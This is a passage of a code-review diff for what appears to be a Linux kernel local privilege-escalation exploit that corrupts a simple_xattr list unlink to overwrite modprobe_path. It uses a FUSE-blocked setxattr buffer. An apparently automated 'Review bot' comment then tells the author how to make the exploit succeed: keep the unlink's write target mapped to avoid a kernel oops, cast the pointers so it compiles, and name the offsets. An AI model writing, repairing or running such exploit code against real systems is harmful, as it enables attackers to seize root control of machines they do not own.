| skipped 265 lines |
266 | 266 | | // copy_from_user blocks forever (prevents double free) |
267 | 267 | | // We don't need to change the 4th qword |
268 | 268 | | unsigned long base_address = FUSE_MEM_ADDR3 - (0x20 - 0x8); |
269 | | - | memcpy(base_address, slash_tmp, 8); |
270 | | - | memcpy(base_address + 8, modprobe_path_plus1, 8); |
| 269 | + | |
| 270 | + | // `slash_tmp` is written to next->prev which is offset 8 bytes from next |
| 271 | + | // so subtract 8 bytes to offset this |
| 272 | + | unsigned long modprobe_path_plus1_prev = *modprobe_path_plus1 - 8; |
| 273 | + | |
| 274 | + | // simple_xattr->next |
| 275 | + | memcpy(base_address, &modprobe_path_plus1_prev, 8); |
| 276 | + | // simple_xattr->prev |
| 277 | + | memcpy(base_address + 8, slash_tmp, 8); |
| 278 | + | // simple_xattr->name |
271 | 279 | | memcpy(base_address + 16, security_a, 8); |
272 | 280 | | |
| 281 | + | // This should never return |
273 | 282 | | int ret = setxattr("/tmp/x", "user.b", base_address, 0x20 - 1, 0); |
274 | | - | // This should never return |
275 | 283 | | printf("setxattr ret: %d\n", ret); |
276 | 284 | | if (ret == -1) |
277 | 285 | | { |
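Review bot: The new comments explain only the `next->prev` store, but a list unlink performs two writes, and if this is the usual `list_del` the companion `prev->next = next` lands at the address formed by the 8 bytes of `slash_tmp`, so that value doubles as a kernel write target and must be mapped (or the unlink faults before the modprobe_path write is useful); I would state that above the `simple_xattr->prev` memcpy with a comment such as "NOTE: the unlink also stores next at the address spelled by slash_tmp; that page must be mapped or the kernel oopses". Separately, the rewritten memcpy calls still pass `base_address`, an `unsigned long`, where `void *` is expected; cast it explicitly, `memcpy((void *)base_address, &modprobe_path_plus1_prev, 8);` and likewise for the `+ 8` and `+ 16` copies, since newer GCC rejects the implicit int-to-pointer conversion rather than warning. The hard-coded `- 8` on the `modprobe_path_plus1_prev` line and the `+ 8`/`+ 16` offsets all encode the same `list_head` layout; one named constant for the `prev` offset would keep them from drifting. The enclosing function starts and ends outside this hunk.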
| skipped 121 lines |
399 | 407 | | wait(NULL); |
400 | 408 | | sleep(0x100000); |
401 | 409 | | } |
| 410 | + | |